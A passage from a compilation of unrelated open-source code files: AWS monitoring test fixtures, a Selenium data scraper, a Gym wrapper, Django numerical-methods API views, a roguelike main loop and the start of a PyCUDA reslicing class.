result = [
{
"arn": "arn:aws:servicequotas:eu-west-1:170858875137:ec2/L-7295265B",
"code": "L-7295265B",
"name": "Running On-Demand X instances",
"created_by": "agent",
"id": "aws_servicequota-ec2-l-7295265b[aws:1234:eu-central-1]",
"infrastructure_account": "aws:1234",
"region": "eu-central-1",
"service": "ec2",
"type": "aws_servicequota",
"usage_metric": {"dimensions": {"Class": "X/OnDemand",
"Resource": "vCPU",
"Service": "EC2",
"Type": "Resource"},
"name": "ResourceCount",
"namespace": "AWS/Usage",
"statistic_recommendation": "Maximum"},
"value": 548.0
},
{
"arn": "arn:aws:servicequotas:eu-west-1:170858875137:ec2/L-E4BF28E0",
"code": "L-E4BF28E0",
"name": "Running On-Demand c4 hosts",
"created_by": "agent",
"id": "aws_servicequota-ec2-l-e4bf28e0[aws:1234:eu-central-1]",
"infrastructure_account": "aws:1234",
"region": "eu-central-1",
"service": "ec2",
"type": "aws_servicequota",
"usage_metric": None,
"value": 2.0
},
]
return quotas, existing, result
def get_sqs_queues():
url1 = 'https://{}.queue.amazonaws.com/123412341234/queue1'.format(REGION)
url2 = 'https://{}.queue.amazonaws.com/123412341234/queue2'.format(REGION)
arn1 = 'arn:aws:sqs:{}:123412341234:queue1'.format(REGION)
arn2 = 'arn:aws:sqs:{}:123412341234:queue2'.format(REGION)
urls = {'QueueUrls': [url1, url2]}
attributes = [{'Attributes': {'ApproximateNumberOfMessagesNotVisible': '45',
'MessageRetentionPeriod': '345600',
'ApproximateNumberOfMessagesDelayed': '0',
'MaximumMessageSize': '262144',
'CreatedTimestamp': '1470131993',
'ApproximateNumberOfMessages': '1',
'ReceiveMessageWaitTimeSeconds': '10',
'DelaySeconds': '0',
'VisibilityTimeout': '30',
'LastModifiedTimestamp': '1470131993',
'QueueArn': arn1,
'RedrivePolicy': json.dumps({'deadLetterTargetArn': arn2, 'maxReceiveCount': 3})
}},
{'Attributes': {'ApproximateNumberOfMessagesNotVisible': '0',
'MessageRetentionPeriod': '3600',
'ApproximateNumberOfMessagesDelayed': '0',
'MaximumMessageSize': '1024',
'CreatedTimestamp': '1470131993',
'ApproximateNumberOfMessages': '0',
'ReceiveMessageWaitTimeSeconds': '15',
'DelaySeconds': '20',
'VisibilityTimeout': '60',
'LastModifiedTimestamp': '1470131993',
'QueueArn': arn2}}]
dead_letter_sources = [
{},
{'queueUrls': [url1]}
]
result = [
{
'id': 'sqs-queue1[{}:{}]'.format(ACCOUNT, REGION),
'created_by': 'agent',
'infrastructure_account': '{}'.format(ACCOUNT),
'region': REGION,
'type': 'aws_sqs',
'name': 'queue1',
'url': url1,
'arn': arn1,
'message_retention_period_seconds': 345600,
'maximum_message_size_bytes': 262144,
'receive_messages_wait_time_seconds': 10,
'delay_seconds': 0,
'visibility_timeout_seconds': 30,
'redrive_policy_dead_letter_target_arn': arn2,
'redrive_policy_max_receive_count': 3
},
{
'id': 'sqs-queue2[{}:{}]'.format(ACCOUNT, REGION),
'created_by': 'agent',
'infrastructure_account': '{}'.format(ACCOUNT),
'region': REGION,
'type': 'aws_sqs',
'name': 'queue2',
'url': url2,
'arn': arn2,
'message_retention_period_seconds': 3600,
'maximum_message_size_bytes': 1024,
'receive_messages_wait_time_seconds': 15,
'delay_seconds': 20,
'visibility_timeout_seconds': 60,
'redrive_policy_dead_letter_source_urls': [url1]
}]
return urls, attributes, dead_letter_sources, result
pg_infrastructure_account = 'aws:12345678'
pg_region = REGION
@pytest.fixture
def fx_addresses(request):
return {'Addresses': [
{'NetworkInterfaceOwnerId': '12345678',
'InstanceId': 'i-1234',
'PublicIp': '192.168.127.12',
'AllocationId': 'eipalloc-12345678'},
{'NetworkInterfaceOwnerId': '12345678',
'PublicIp': '192.168.127.12',
'AllocationId': 'eipalloc-22334455'},
{'NetworkInterfaceOwnerId': '32165478',
'InstanceId': 'i-7777',
'PublicIp': '172.16.58.3',
'AllocationId': 'eipalloc-45454545'}]}
@pytest.fixture
def fx_addresses_expected(request):
return [
{'NetworkInterfaceOwnerId': '12345678',
'InstanceId': 'i-1234',
'PublicIp': '192.168.127.12',
'AllocationId': 'eipalloc-12345678'},
{'NetworkInterfaceOwnerId': '12345678',
'PublicIp': '192.168.127.12',
'AllocationId': 'eipalloc-22334455'}]
@pytest.fixture()
def fx_asgs(request):
return [
{'type': 'asg',
'infrastructure_account': pg_infrastructure_account,
'region': 'eu-central-1',
'spilo_cluster': 'bla',
'name': 'spilo-bla',
'instances': [{'aws_id': 'i-1234', 'ip': '192.168.127.12'},
{'aws_id': 'i-02e0', 'ip': '192.168.3.11'}]},
{'type': 'asg',
'infrastructure_account': pg_infrastructure_account,
'region': 'eu-central-1',
'spilo_cluster': 'malm',
'name': 'spilo-malm',
'instances': [{'aws_id': 'i-4444', 'ip': '10.20.30.40'},
{'aws_id': 'i-5555', 'ip': '172.16.31.10'}]},
{'type': 'asg',
'infrastructure_account': pg_infrastructure_account,
'region': 'eu-central-1',
'something_else': 'foo',
'name': 'app-foo',
'instances': [{'aws_id': 'i-7845'},
{'aws_id': 'i-9854'}]},
{'type': 'asg',
'infrastructure_account': 'aws:32165487',
'region': 'eu-central-1',
'spilo_cluster': 'baz',
'name': 'spilo-baz',
'instances': [{'aws_id': 'i-6587'},
{'aws_id': 'i-6565'}]}]
@pytest.fixture()
def fx_asgs_expected(request):
return [
{'type': 'asg',
'infrastructure_account': pg_infrastructure_account,
'region': 'eu-central-1',
'spilo_cluster': 'bla',
'name': 'spilo-bla',
'instances': [{'aws_id': 'i-1234', 'ip': '192.168.127.12'},
{'aws_id': 'i-02e0', 'ip': '192.168.3.11'}]},
{'type': 'asg',
'infrastructure_account': pg_infrastructure_account,
'region': 'eu-central-1',
'spilo_cluster': 'malm',
'name': 'spilo-malm',
'instances': [{'aws_id': 'i-4444', 'ip': '10.20.30.40'},
{'aws_id': 'i-5555', 'ip': '172.16.31.10'}]}]
@pytest.fixture()
def fx_pg_instances(request):
return [{'type': 'instance',
'infrastructure_account': pg_infrastructure_account,
'aws_id': 'i-1234',
'ip': '192.168.1.1',
'role': 'master',
'stack_name': 'spilo'},
{'type': 'instance',
'infrastructure_account': pg_infrastructure_account,
'aws_id': 'i-02e0',
'ip': '192.168.1.3',
'role': 'replica',
'stack_name': 'spilo'},
{'type': 'instance',
'infrastructure_account': pg_infrastructure_account,
'aws_id': 'i-4444',
'ip': '192.168.13.32',
'role': 'master',
'stack_name': 'spilo'},
{'type': 'instance',
'infrastructure_account': pg_infrastructure_account,
'aws_id': 'i-5555',
'ip': '192.168.31.154',
'role': 'replica',
'stack_name': 'spilo'},
{'type': 'instance',
'infrastructure_account': 'aws:32165487',
'aws_id': 'i-4321',
'ip': '192.168.1.2',
'role': 'replica',
'stack_name': 'spilo'}]
@pytest.fixture()
def fx_pg_instances_expected(request):
return [{'type': 'instance',
'infrastructure_account': pg_infrastructure_account,
'aws_id': 'i-1234',
'ip': '192.168.1.1',
'role': 'master',
'stack_name': 'spilo'},
{'type': 'instance',
'infrastructure_account': pg_infrastructure_account,
'aws_id': 'i-02e0',
'ip': '192.168.1.3',
'role': 'replica',
'stack_name': 'spilo'},
{'type': 'instance',
'infrastructure_account': pg_infrastructure_account,
'aws_id': 'i-4444',
'ip': '192.168.13.32',
'role': 'master',
'stack_name': 'spilo'},
{'type': 'instance',
'infrastructure_account': pg_infrastructure_account,
'aws_id': 'i-5555',
'ip': '192.168.31.154',
'role': 'replica',
'stack_name': 'spilo'}]
@pytest.fixture()
def fx_eip_allocation(request):
return 'eipalloc-22334455'
@pytest.fixture()
def fx_launch_configuration(request):
return {
'LaunchConfigurations': [
{
'LaunchConfigurationName': 'spilo-malm-AppServerInstanceProfile-66CCXX77EEPP',
'UserData': 'ZW52aXJvbm1lbnQ6IHtFSVBfQUxMT0NBVElPTjogZWlwYWxsb2MtMjIzMzQ0NTV9Cg=='
},
{
'LaunchConfigurationName': 'spilo-foo-staging-AppServerInstanceProfile-66CCXX77YYZZ',
'UserData': 'ZW52aXJvbm1lbnQ6IHtFSVBfQUxMTzMzQ0NTV9Cg=='
}
]
}
@pytest.fixture()
def fx_hosted_zones(request):
return {'HostedZones': [
{'ResourceRecordSetCount': 724,
'Name': 'db.zalan.do.',
'Config': {
'PrivateZone': 'false',
'Comment': 'Public Hosted Zone'},
'CallerReference': 'sevenseconds-db.zalan.do',
'Id': '/hostedzone/Z1FLVOF8MF971S'}]}
@pytest.fixture()
def fx_hosted_zones_expected(request):
return ['/hostedzone/Z1FLVOF8MF971S']
@pytest.fixture()
def fx_launch_configuration_expected(request):
return {'malm': 'ZW52aXJvbm1lbnQ6IHtFSVBfQUxMT0NBVElPTjogZWlwYWxsb2MtMjIzMzQ0NTV9Cg==',
'foo-staging': 'ZW52aXJvbm1lbnQ6IHtFSVBfQUxMTzMzQ0NTV9Cg=='}
@pytest.fixture()
def fx_recordsets(request):
return {'ResourceRecordSets': [
{'Type': 'CNAME',
'Name': 'this.that.db.zalan.do.',
'ResourceRecords': [
{'Value': 'ec2-11-22-33-44.eu-central-1.compute.amazonaws.com.'}],
'TTL': 600},
{'Type': 'CNAME',
'Name': 'other.cluster.co.uk.',
'ResourceRecords': [
{'Value': 'ec2-22-33-44-55.eu-central-1.compute.amazonaws.com.'}],
'TTL': 600},
{'Type': 'CNAME',
'Name': 'something.interesting.com.',
'ResourceRecords': [
{'Value': 'ec2-12-23-34-45.eu-central-1.compute.amazonaws.com.'}],
'TTL': 600},
]}
@pytest.fixture()
def fx_ips_dnsnames(request):
return {'11.22.33.44': 'this.that.db.zalan.do',
'12.23.34.45': 'something.interesting.com',
'22.33.44.55': 'other.cluster.co.uk'}
PG_CLUSTER = 'malm'
``` |
{
"source": "jralbbuquerque/dashboard-covid19",
"score": 3
} |
#### File: dashboard-covid19/util/webscraping.py
```python
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import time
def scraping_data_covid(url, path_download):
# Define the options object
option = Options()
# Save the file to the specified directory
option.add_experimental_option("prefs",
{"download.default_directory": str(path_download)})
# Assign the webdriver object with the preset options to the driver variable
driver = webdriver.Chrome(chrome_options=option)
# Open Chrome at the URL
driver.get(url)
# Wait 5 seconds for the whole page to load
time.sleep(5)
# Locate the download button
driver.find_element_by_xpath(
"//*[@class='btn-white md button button-solid button-has-icon-only ion-activatable ion-focusable hydrated']").click()
# Wait 15 seconds for the file to finish downloading
time.sleep(15)
# Close the page
driver.quit()
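# Example call (URL and download folder are placeholders only):
#   scraping_data_covid('https://covid.saude.gov.br', '/tmp/covid19')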
``` |
{
"source": "jraleman/42_Walking_Marvin",
"score": 3
} |
#### File: marvin/lib/open_ai_gym.py
```python
import gym
from gym import wrappers
class OpenAIGym(object):
"""
Class to set up the Open AI Gym environment
"""
def __init__(self, game):
self.game_name = game
self.max_steps = 1000
self.max_generations = 100
self.population_count = 42
self.mutation_rate = 0.042
self.env = gym.make(game)
self.video = './videos'
self.in_dimen = self.env.observation_space.shape[0]
self.out_dimen = self.env.action_space.shape[0]
self.obs_min = self.env.observation_space.low
self.obs_max = self.env.observation_space.high
self.action = None
self.action_min = self.env.action_space.low
self.action_max = self.env.action_space.high
self.node_count = [self.in_dimen, 13, 8, 13, self.out_dimen]
return None
def videoMonitor(self):
self.env = wrappers.Monitor(self.env, self.video, force='True')
return self.env
# Get methods
def getGameName(self):
return self.game_name
def getMaxGenerations(self):
return self.max_generations
def getPopulationCount(self):
return self.population_count
def getMaxSteps(self):
return self.max_steps
def getMutationRate(self):
return self.mutation_rate
def getEnv(self):
return self.env
def getRender(self):
return self.env.render()
def getObservation(self):
return self.env.reset()
def getInDimen(self):
return self.in_dimen
def getOutDimen(self):
return self.out_dimen
def getObsMin(self):
return self.obs_min
def getObsMax(self):
return self.obs_max
def getAction(self):
return self.action
def getActionMin(self):
return self.action_min
def getActionMax(self):
return self.action_max
def getNodeCount(self):
return self.node_count
# Set methods
def setGameName(self, val):
self.game_name = val
return None
def setMaxGenerations(self, val):
self.max_generations = val
return None
def setPopulationCount(self, val):
self.population_count = val
return None
def setMaxSteps(self, val):
self.max_steps = val
return None
def setMutationRate(self, val):
self.mutation_rate = val
return None
def setInDimen(self, val):
self.in_dimen = val
return None
def setOutDimen(self, val):
self.out_dimen = val
return None
def setObsMin(self, val):
self.obs_min = val
return None
def setObsMax(self, val):
self.obs_max = val
return None
def setAction(self, val):
self.action = self.env.step(val)
return None
def setActionMin(self, val):
self.action_min = val
return None
def setActionMax(self, val):
self.action_max = val
return None
def setNodeCount(self, val):
self.node_count = val
return None
def setVideo(self, val):
self.video = val
return None
```
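A minimal usage sketch for the `OpenAIGym` wrapper above, assuming a working Gym installation and a continuous-control environment id such as `BipedalWalker-v2` (the id and the import path are assumptions, not taken from the repository):
```python
# Hypothetical usage of the OpenAIGym wrapper; "BipedalWalker-v2" and the
# import path are assumed, not confirmed by the repository.
from open_ai_gym import OpenAIGym  # assumed import path
gym_wrapper = OpenAIGym("BipedalWalker-v2")
observation = gym_wrapper.getObservation()  # resets the environment
print(gym_wrapper.getInDimen(), gym_wrapper.getOutDimen())
# Step once with a zero action vector of the correct dimension
gym_wrapper.setAction([0.0] * gym_wrapper.getOutDimen())
obs, reward, done, info = gym_wrapper.getAction()  # tuple returned by env.step
```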
#### File: marvin/lib/utilities.py
```python
def map_range(value, leftMin, leftMax, rightMin, rightMax):
    """
    Linearly maps a value from one range to another.
    """
    leftSpan = leftMax - leftMin
    rightSpan = rightMax - rightMin
    valueScaled = float(value - leftMin) / float(leftSpan)
    return rightMin + (valueScaled * rightSpan)
def normalize_array(aVal, aMin, aMax):
    """
    Normalize each element of an array to the range [-1, 1].
    """
    res = []
    for i in range(len(aVal)):
        res.append(map_range(aVal[i], aMin[i], aMax[i], -1, 1))
    return res
def scale_array(aVal, aMin, aMax):
    """
    Scale a [-1, 1] normalized array back to its original range.
    """
    res = []
    for i in range(len(aVal)):
        res.append(map_range(aVal[i], -1, 1, aMin[i], aMax[i]))
    return res
def debug_object(obj):
    """
    Print an object and exit the program.
    """
    print(obj)
    exit(42)
``` |
{
"source": "jralvarenga/mathapi",
"score": 2
} |
#### File: math/function/function_points.py
```python
import json
from mathapi.lib.math_ops import evaluate_fx, format_fx
from django.http import HttpResponse
def create_range(start, stop, step):
arr = [start]
value = start
while value < stop:
value = value + step
arr.append(value)
return arr
def solve_points(fx, a_limit, b_limit, step):
x_values = create_range(a_limit, b_limit, step)
y_values = []
for x in x_values:
result = evaluate_fx(fx, x)
y_values.append(result)
return {
'x': x_values,
'y': y_values
}
def function_points(req):
# Get params
params = req.GET
step = params.get('step')
# Get body
body = json.loads( req.body.decode('utf-8') )
fx = body['fx']
fx = format_fx(fx)
from_limit = body['from']
to_limit = body['to']
if step != None:
step = float(step)
else:
step = 1
points = solve_points(fx, from_limit, to_limit, step)
res = json.dumps(points)
return HttpResponse(res, content_type="application/json")
```
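Note that `create_range` above is endpoint-inclusive and can overshoot `stop` by up to one `step`, so the last sampled x may lie slightly past the requested upper limit. A standalone check of that behaviour (the function body is repeated here so the snippet runs without the Django or `mathapi` imports):
```python
# Copy of create_range from above, repeated so this check is self-contained.
def create_range(start, stop, step):
    arr = [start]
    value = start
    while value < stop:
        value = value + step
        arr.append(value)
    return arr
print(create_range(0, 1, 0.4))
# [0, 0.4, 0.8, 1.2000000000000002] -- the last point overshoots stop
```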
#### File: math/integral/integral.py
```python
import json
from mathapi.lib.math_ops import format_fx, format_fx_string, get_integral_fx
from django.http import HttpResponse
def integral(req):
# Get params
params = req.GET
order = params.get('order')
order = int(order) if order else 1
# Get body
body = json.loads( req.body.decode('utf-8') )
fx = body['fx']
fx = format_fx(fx)
integral = get_integral_fx(fx)
integral = format_fx_string(str(integral))
data = {
'integral': integral,
}
res = json.dumps(data)
return HttpResponse(res, content_type="application/json")
```
#### File: methods/function_root/muller_method.py
```python
import json
import math
from mathapi.lib.math_ops import absolute_error, evaluate_fx, format_fx
from django.http import HttpResponse
def apply_method(fx, x0, x1, x2, tolerancy):
k = 0
error = 1
while error >= tolerancy:
fx0 = evaluate_fx(fx, x0)
fx1 = evaluate_fx(fx, x1)
fx2 = evaluate_fx(fx, x2)
h1 = x1 - x0
h2 = x2 - x1
delta1 = (fx1 - fx0)/h1
delta2 = (fx2 - fx1)/h2
a = (delta2 - delta1)/(h2 + h1)
b = a*h2 + delta2
c = fx2
xn = x2 + (-2*c)/(b + math.sqrt( b**(2) - 4*a*c ))
error = absolute_error(x2, xn)
x0, x1, x2 = x1, x2, xn
k = k + 1
return {
'root': xn,
'iterations': k
}
def apply_method_with_iteration(fx, x0, x1, x2, tolerancy):
k = 0
error = 1
values = []
while error >= tolerancy:
fx0 = evaluate_fx(fx, x0)
fx1 = evaluate_fx(fx, x1)
fx2 = evaluate_fx(fx, x2)
h1 = x1 - x0
h2 = x2 - x1
delta1 = (fx1 - fx0)/h1
delta2 = (fx2 - fx1)/h2
a = (delta2 - delta1)/(h2 + h1)
b = a*h2 + delta2
c = fx2
xn = x2 + (-2*c)/(b + math.sqrt( b**(2) - 4*a*c ))
values.append({
'value': xn,
'iteration': k
})
error = absolute_error(x2, xn)
x0, x1, x2 = x1, x2, xn
k = k + 1
return values
def muller_method(req):
# Get params
params = req.GET
format = params.get('format')
tolerancy = params.get('tolerancy')
# Get body
body = json.loads( req.body.decode('utf-8') )
fx = body['fx']
fx = format_fx(fx)
x0 = body['x0']
x1 = body['x1']
x2 = body['x2']
if tolerancy != None:
tolerancy = float(tolerancy) / 100
else:
tolerancy = 0.001
if format == 'every_iteration':
data = apply_method_with_iteration(fx, x0, x1, x2, tolerancy)
else:
data = apply_method(fx, x0, x1, x2, tolerancy)
res = json.dumps(data)
return HttpResponse(res, content_type="application/json")
```
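A self-contained sketch of the same Muller update applied to f(x) = x**2 - 2, with plain lambdas standing in for `evaluate_fx` and `absolute_error` (which live in `mathapi.lib.math_ops` and are not shown here). Like the view above, it assumes the discriminant stays non-negative, since `math.sqrt` rather than a complex square root is used:
```python
import math
f = lambda x: x**2 - 2         # stand-in for evaluate_fx(fx, x)
err = lambda a, b: abs(a - b)  # stand-in (assumed) for absolute_error
x0, x1, x2, tol = 0.0, 1.0, 2.0, 1e-8
error = 1.0
while error >= tol:
    fx0, fx1, fx2 = f(x0), f(x1), f(x2)
    h1, h2 = x1 - x0, x2 - x1
    delta1, delta2 = (fx1 - fx0) / h1, (fx2 - fx1) / h2
    a = (delta2 - delta1) / (h2 + h1)
    b = a * h2 + delta2
    c = fx2
    xn = x2 + (-2 * c) / (b + math.sqrt(b**2 - 4 * a * c))
    error = err(x2, xn)
    x0, x1, x2 = x1, x2, xn
print(xn)  # ~1.4142135623730951, the positive root of x**2 - 2
```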
#### File: methods/function_root/secant_method.py
```python
import json
from mathapi.lib.math_ops import absolute_error, evaluate_fx, format_fx
from django.http import HttpResponse
def apply_method(f, x0, x1, tolerancy):
k = 0
error = 1
while error >= tolerancy:
fx0 = evaluate_fx(f, x0)
fx1 = evaluate_fx(f, x1)
diff_f = fx1 - fx0
if diff_f != 0:
x2 = x1 - ( (fx1 * (x1 - x0)) / diff_f)
error = absolute_error(x2, x1)
x0, x1 = x1, x2
k = k + 1
else:
break
return {
'root': x2,
'iterations': k
}
def apply_method_with_iteration(f, x0, x1, tolerancy):
k = 0
values = []
error = 1
while error >= tolerancy:
fx0 = evaluate_fx(f, x0)
fx1 = evaluate_fx(f, x1)
diff_f = fx1 - fx0
if diff_f != 0:
x2 = x1 - ( (fx1 * (x1 - x0)) / diff_f)
values.append({
'value': x2,
'iteration': k
})
error = absolute_error(x2, x1)
x0, x1 = x1, x2
k = k + 1
else:
break
return values
def secant_method(req):
# Get params
params = req.GET
format = params.get('format')
tolerancy = params.get('tolerancy')
# Get body
body = json.loads( req.body.decode('utf-8') )
fx = body['fx']
fx = format_fx(fx)
x0 = body['x0']
x1 = body['x1']
if tolerancy != None:
tolerancy = float(tolerancy) / 100
else:
tolerancy = 0
fx0 = evaluate_fx(fx, x0)
fx1 = evaluate_fx(fx, x1)
if (fx0 - fx1) != 0:
if format == 'every_iteration':
data = apply_method_with_iteration(fx, x0, x1, tolerancy)
else:
data = apply_method(fx, x0, x1, tolerancy)
res = json.dumps(data)
return HttpResponse(res, content_type="application/json")
else:
return HttpResponse('error')
```
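The same kind of standalone sketch for the secant update above, again with a lambda standing in for `evaluate_fx` and a plain absolute difference standing in for `absolute_error` (an assumption, since that helper is not shown):
```python
f = lambda x: x**2 - 2  # stand-in for evaluate_fx(fx, x)
x0, x1, tol = 1.0, 2.0, 1e-8
error = 1.0
while error >= tol:
    fx0, fx1 = f(x0), f(x1)
    diff_f = fx1 - fx0
    if diff_f == 0:
        break
    x2 = x1 - (fx1 * (x1 - x0)) / diff_f
    error = abs(x2 - x1)
    x0, x1 = x1, x2
print(x1)  # ~1.4142135623730951
```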
#### File: methods/integral/simpson_method.py
```python
import json
from mathapi.lib.math_ops import absolute_error, evaluate_fx, format_fx, get_dx
from django.http import HttpResponse
# Simpson's rule 1/3 simple
def simpson_13_simple(fx, a, b):
m = (a + b)/2
fa = evaluate_fx(fx, a)
fb = evaluate_fx(fx, b)
fm = evaluate_fx(fx, m)
value = ((b - a)/6)*(fa + 4*fm + fb)
h = (b - a)/2
d4x = get_dx(fx, 4)
d4e = evaluate_fx(str(d4x), ((b + a)/2))
error = (-(h**(5))/90)*d4e
return {
'integral': value,
'error': abs(round(error, 3))
}
# Simpson's rule 1/3 composite
def simpson_13_composite(fx, a, b, n):
fa = evaluate_fx(fx, a)
fb = evaluate_fx(fx, b)
h = (b - a) / n
sum_1 = 0
sum_2 = 0
for i in range(1,n):
c = a + i*h
fc = evaluate_fx(fx, c)
if i%2 == 0:
            # Summation 1 (even-index nodes, weight 2)
            sum_1 = fc + sum_1
        else:
            # Summation 2 (odd-index nodes, weight 4)
            sum_2 = fc + sum_2
value = (h/3)*(fa + 2*sum_1 + 4*sum_2 + fb)
d4x = get_dx(fx, 4)
d4e = evaluate_fx(str(d4x), ((b + a)/2))
error = ((b - a)*(h**(4))/180)*d4e
return {
'integral': value,
'error': abs(round(error, 3))
}
# Simpson's rule 3/8 simple
def simpson_38_simple(fx, a, b):
h = (b - a)/3
fa = evaluate_fx(fx, a)
fb = evaluate_fx(fx, b)
f_1 = evaluate_fx(fx, (2*a + b)/3)
f_2 = evaluate_fx(fx, (2*b + a)/3)
value = (3*h/8)*(fa + 3*f_1 + 3*f_2 + fb)
d4x = get_dx(fx, 4)
d4e = evaluate_fx(str(d4x), ((b + a)/2))
error = -(3/80)*(h**(5))*d4e
return {
'integral': value,
'error': abs(round(error, 3))
}
# Simpson's rule 3/8 composite
def simpson_38_composite(fx, a, b, n):
fa = evaluate_fx(fx, a)
fb = evaluate_fx(fx, b)
h = (b - a) / n
sum_1 = 0
sum_2 = 0
for i in range(1,n):
c = a + i*h
fc = evaluate_fx(fx, c)
if i%2 == 0:
            # Summation 1 (even-index nodes, weight 2)
            sum_1 = fc + sum_1
        else:
            # Summation 2 (odd-index nodes, weight 3)
            sum_2 = fc + sum_2
value = (3*h/8)*(fa + 2*sum_1 + 3*sum_2 + fb)
d4x = get_dx(fx, 4)
d4e = evaluate_fx(str(d4x), ((b + a)/2))
error = (n/80)*(h**(5))*d4e
return {
'integral': value,
'error': abs(round(error, 3))
}
# Simpson 1/3 rule with pairs
def simpson_pairs_13(x, y):
n = len(x)
value = 0
sum_1 = y[0] + y[-1]
sum_2 = 0
sum_3 = 0
h = 0
count = 0
for i in range(1, n, 2):
limit = x[i] - x[i - 1]
h = h + limit
count = count + 1
for i in range(1, n-1):
if (i % 2) == 0:
            # Summation 3 (even-index ordinates)
            sum_3 = sum_3 + (y[i])
        else:
            # Summation 2 (odd-index ordinates)
            sum_2 = sum_2 + (y[i])
h = h/count
value = (h/3)*(sum_1 + 4*sum_2 + 2*sum_3)
return {
'integral': value,
'error': abs(0)
}
# Simpson 3/8 rule with pairs
def simpson_pairs_38(x, y):
n = len(x)
value = 0
sum_1 = y[0] + y[-1]
sum_2 = 0
sum_3 = 0
h = 0
count = 0
for i in range(1, n, 2):
limit = x[i] - x[i - 1]
h = h + limit
count = count + 1
for i in range(3, n - 1, 3):
sum_2 = sum_2 + y[i]
for i in range(0, n-1):
if (i % 3) != 0:
            # Summation 3 (indices not divisible by 3)
sum_3 = sum_3 + (y[i])
h = h/count
value = (3*h/8)*(sum_1 + 2*sum_2 + 3*sum_3)
return {
'integral': value,
'error': abs(0)
}
def simpson_method(req):
# Get params
params = req.GET
type = params.get('type')
iterations = int(params.get('iterations')) if params.get('iterations') != None else 100
# Get body
body = json.loads( req.body.decode('utf-8') )
if type == '1/3_simple':
fx = body['fx']
fx = format_fx(fx)
a = body['a']
b = body['b']
data = simpson_13_simple(fx, a, b)
elif type == '1/3_composite':
fx = body['fx']
fx = format_fx(fx)
a = body['a']
b = body['b']
data = simpson_13_composite(fx, a, b, iterations)
elif type == '3/8_simple':
fx = body['fx']
fx = format_fx(fx)
a = body['a']
b = body['b']
data = simpson_38_simple(fx, a, b)
elif type == '3/8_composite':
fx = body['fx']
fx = format_fx(fx)
a = body['a']
b = body['b']
data = simpson_38_composite(fx, a, b, iterations)
elif type == '1/3_ordered_pairs':
x = body['x']
y = body['y']
data = simpson_pairs_13(x, y)
elif type == '3/8_ordered_pairs':
x = body['x']
y = body['y']
data = simpson_pairs_38(x, y)
else:
fx = body['fx']
fx = format_fx(fx)
a = body['a']
b = body['b']
data = simpson_13_composite(fx, a, b, iterations)
res = json.dumps(data)
return HttpResponse(res, content_type="application/json")
```
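As a quick sanity check on `simpson_13_simple` above: the quadrature part reduces to ((b - a)/6) * (f(a) + 4*f(m) + f(b)) with m = (a + b)/2, which is exact for polynomials up to degree three. A standalone arithmetic check of just that part (the derivative-based error term is skipped because it needs `get_dx`):
```python
f = lambda x: x**2  # the exact integral of x**2 over [0, 3] is 9
a, b = 0.0, 3.0
m = (a + b) / 2
value = ((b - a) / 6) * (f(a) + 4 * f(m) + f(b))
print(value)  # 9.0 -- matches the exact integral
```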
#### File: methods/integral/trapz_method.py
```python
import json
from mathapi.lib.math_ops import absolute_error, evaluate_fx, format_fx, get_dx
from django.http import HttpResponse
def trapz_simple(fx, a, b):
fa = evaluate_fx(fx, a)
fb = evaluate_fx(fx, b)
dx = get_dx(fx, 2)
dab = evaluate_fx(str(dx), a)
value = (b - a)*(fa + fb)/2
error = (-1/12)*(dab)*((b - a)**3)
return {
'integral': value,
'error': round(abs(error), 3)
}
def trapz_composite(fx, a, b, iterations):
fa = evaluate_fx(fx, a)
fb = evaluate_fx(fx, b)
dx = get_dx(fx, 2)
dab = evaluate_fx(str(dx), 0)
h = (b - a)/iterations
fafb = (fa + fb)/2
sumatory = 0
for i in range(0, iterations):
eval_value = a + i*h
f_eval = evaluate_fx(fx, eval_value)
sumatory = f_eval + sumatory
value = h*( (fafb) + sumatory )
error = -( ((b - a)**3)/(12*(iterations**2)) * (dab) )
return {
'integral': value,
'error': round(abs(error), 3)
}
def trapz_pairs(x, y):
n = len(x)
value = 0
for i in range(1, n):
a = x[i - 1]
b = x[i]
h = b - a
value = (h/2)*(y[i - 1] + y[i]) + value
return {
'integral': value,
'error': 0.0
}
def trapz_method(req):
# Get params
params = req.GET
type = params.get('type')
iterations = int(params.get('iterations')) if params.get('iterations') != None else 100
# Get body
body = json.loads( req.body.decode('utf-8') )
if type == 'simple':
fx = body['fx']
fx = format_fx(fx)
a = body['a']
b = body['b']
data = trapz_simple(fx, a, b)
elif type == 'composite':
fx = body['fx']
fx = format_fx(fx)
a = body['a']
b = body['b']
data = trapz_composite(fx, a, b, iterations)
elif type == 'ordered_pairs':
x = body['x']
y = body['y']
data = trapz_pairs(x, y)
else:
fx = body['fx']
fx = format_fx(fx)
a = body['a']
b = body['b']
data = trapz_composite(fx, a, b, iterations)
res = json.dumps(data)
return HttpResponse(res, content_type="application/json")
``` |
{
"source": "jram930/rogue-learn-1",
"score": 2
} |
#### File: rogue-learn-1/src/main.py
```python
import tcod
from tcod.event import Event
from tcod.libtcodpy import map_get_height
from actions import EscapeAction, MovementAction
from engine import Engine
from entity import Entity
from procgen import generate_dungeon
from input_handlers import EventHandler
def main() -> None:
screen_width = 80
screen_height = 50
map_width = 80
map_height = 45
room_max_size = 10
room_min_size = 6
max_rooms = 30
max_monsters_per_room = 2
tileset = tcod.tileset.load_tilesheet(
"dejavu10x10_gs_tc.png", 32, 8, tcod.tileset.CHARMAP_TCOD
)
event_handler = EventHandler()
player = Entity(int(screen_width / 2),
int(screen_height / 2), "@", (255, 255, 255))
game_map = generate_dungeon(
max_rooms=max_rooms,
room_min_size=room_min_size,
room_max_size=room_max_size,
map_width=map_width,
map_height=map_height,
max_monsters_per_room=max_monsters_per_room,
player=player
)
engine = Engine(event_handler=event_handler,
game_map=game_map, player=player)
with tcod.context.new_terminal(
screen_width,
screen_height,
tileset=tileset,
title="rogue-learn-1",
vsync=True,
) as context:
root_console = tcod.Console(screen_width, screen_height, order="F")
while True:
engine.render(console=root_console, context=context)
events = tcod.event.wait()
engine.handle_events(events)
if __name__ == "__main__":
main()
``` |
{
"source": "jramalhinho/fan-slicer",
"score": 3
} |
#### File: fanslicer/pycuda_simulation/intensity_volume.py
```python
import json
import os
import numpy as np
import matplotlib.pyplot as plt
import pydicom as dicom
import nibabel as nib
import pycuda.driver as drv
import pycuda.gpuarray as gpua
from pycuda.compiler import SourceModule
import fanslicer.pycuda_simulation.cuda_reslicing as cres
class IntensityVolume:
"""
Class that holds a 3D intensity volume image
and tools for reslicing it
"""
def __init__(self,
config_dir,
vol_dir,
image_num=1,
downsampling=1,
file_type='npy',
npy_config=None):
"""
Create intensity volume object
:param config_dir: json file with reslicing parameters
:param vol_dir: file with 3D volume
